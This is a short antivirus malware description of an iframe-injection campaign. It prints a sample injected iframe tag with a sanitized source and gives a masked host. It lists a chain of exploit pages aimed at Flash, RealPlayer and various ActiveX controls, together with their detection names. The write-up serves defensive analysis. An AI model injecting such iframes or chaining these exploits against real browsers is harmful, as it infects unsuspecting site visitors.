Symptoms
It currently leads to a Rootkit.Agent.AIWN infection.
Removal instructions:
Please let BitDefender disinfect your files.
Analyzed By
Alexandru Maximciuc, virus researcher
Technical Description:
Detects a type of malicious iframes injected in legit webpages.
The iframe tag looks like:
<iframe src=http://sanitized/fxx.htm width=100 height=0> I'll base this description on a valid site(many of them were sanitized or taken down):
hxxp://www.*******.cn/a114/fxx.htm (please don't access that page in your browser unless you know what you're doing.)
The
fxx.htm page which only contains a SCRIPT tag and here the fun begins(with many iframes injected in page):
*
fx.htm - this one tries to exploit a vulnerability in FlashPlayer
*
../a1/ss.htm *
../a1/MS06014.htm *
../a1/sina.htm - if
Sina Downloader.DLoader.1 Activex Control is available
*
../a1/no.htm - if
UUUPGRADE.UUUpgradeCtrl.1 ActiveX Control is available
*
../a1/bfyy.htm - if
MPS.StormPlayer ActiveX Control is available
*
../a1/GLWORLD.html - for
GLIEDown.IEDown.1 *
../a1/real.htm - for
RealPlayer IERPCtl.IERPCtl.1 if
RealPlayer's version is older than 6.0.14.552 (or it)
*
../a1/real.hTml - if
RealPlayer's version is newer than 6.0.14.552
fx.htm is detected as
Trojan.Exploit.ANPI and, depending on browser, leads to a
Trojan.Exploit.SSX for browser which have "
msie" in their User-Agent, respectively
Trojan.JS.Redirector.E for the rest of browsers. This leads eventually to some flash files detected as
Exploit.SWF.Gen.
SHARE
THIS ON